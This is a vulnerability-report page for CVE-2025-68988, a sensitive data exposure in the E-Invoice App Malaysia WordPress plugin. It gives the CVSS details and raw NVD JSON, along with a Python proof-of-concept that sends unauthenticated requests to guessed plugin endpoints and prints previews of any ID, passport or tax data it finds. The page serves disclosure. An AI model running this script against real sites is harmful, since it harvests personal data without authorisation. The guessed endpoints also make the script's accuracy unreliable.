Security Vulnerability Report
中文
CVE-2025-68988 CVSS 5.3 MEDIUM

CVE-2025-68988

Published: 2025-12-30 11:15:57
Last Modified: 2026-04-27 19:16:40

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in o2oe E-Invoice App Malaysia einvoiceapp-malaysia allows Retrieve Embedded Sensitive Data.This issue affects E-Invoice App Malaysia: from n/a through <= 1.3.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

E-Invoice App Malaysia <= 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68988 PoC - E-Invoice App Malaysia Sensitive Data Exposure # Affected Version: <= 1.3.0 # Reference: https://patchstack.com/database/Wordpress/Plugin/einvoiceapp-malaysia import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-68988 """ # Common WordPress REST API endpoints for the plugin endpoints = [ '/wp-json/einvoice/v1/data', '/wp-json/einvoice/v1/invoices', '/wp-json/einvoice/v1/sensitive-data', '/wp-admin/admin-ajax.php?action=einvoice_get_data', '/wp-admin/admin-ajax.php?action=einvoice_fetch_sensitive' ] vulnerable = False exposed_data = [] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check for sensitive data exposure if response.status_code == 200: content = response.text.lower() # Check for sensitive keywords in response sensitive_keywords = ['tax', 'invoice', 'amount', 'ssm', 'ic_no', 'nric', 'passport', 'address', 'company'] if any(keyword in content for keyword in sensitive_keywords): vulnerable = True exposed_data.append({ 'endpoint': endpoint, 'status': response.status_code, 'data_preview': response.text[:500] }) except requests.RequestException as e: print(f"Error testing {endpoint}: {e}") return vulnerable, exposed_data if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-68988-poc.py <target_url>") print("Example: python cve-2025-68988-poc.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Testing target: {target}") print(f"[*] Checking for CVE-2025-68988 vulnerability...\n") is_vulnerable, data = check_vulnerability(target) if is_vulnerable: print("[+] VULNERABLE: Sensitive data exposure detected!") for item in data: print(f"\n[+] Exposed endpoint: {item['endpoint']}") print(f"[+] Status code: {item['status']}") print(f"[+] Data preview: {item['data_preview']}") else: print("[-] Not vulnerable or target not running E-Invoice App Malaysia plugin") print("\n[!] Remediation: Upgrade E-Invoice App Malaysia to version > 1.3.0")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68988", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:57.450", "lastModified": "2026-04-27T19:16:39.947", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in o2oe E-Invoice App Malaysia einvoiceapp-malaysia allows Retrieve Embedded Sensitive Data.This issue affects E-Invoice App Malaysia: from n/a through <= 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/einvoiceapp-malaysia/vulnerability/wordpress-e-invoice-app-malaysia-plugin-1-1-0-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}